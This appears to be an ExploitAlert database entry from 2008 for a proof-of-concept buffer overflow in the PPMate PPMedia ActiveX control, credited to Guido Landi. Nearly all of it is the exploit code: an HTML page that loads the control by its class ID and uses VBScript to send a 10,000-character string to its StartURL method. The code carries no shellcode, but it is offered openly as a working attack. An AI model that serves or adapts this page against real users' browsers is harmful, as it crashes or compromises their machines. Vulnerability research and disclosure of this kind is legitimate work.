|
|
| Details : ExploitAlert |
|
|
Topic : | PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
|
ExploitAlert : 4350
Credit : Guido Landi
Date : 18.7.2008
Download
 Exploit Code : <html>
<body>
<object id=target
classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>
<script language=vbscript>
arg1=String(10000, "A")
target.StartURL(arg1)
</script>
</body>
</html>
|
|
|
|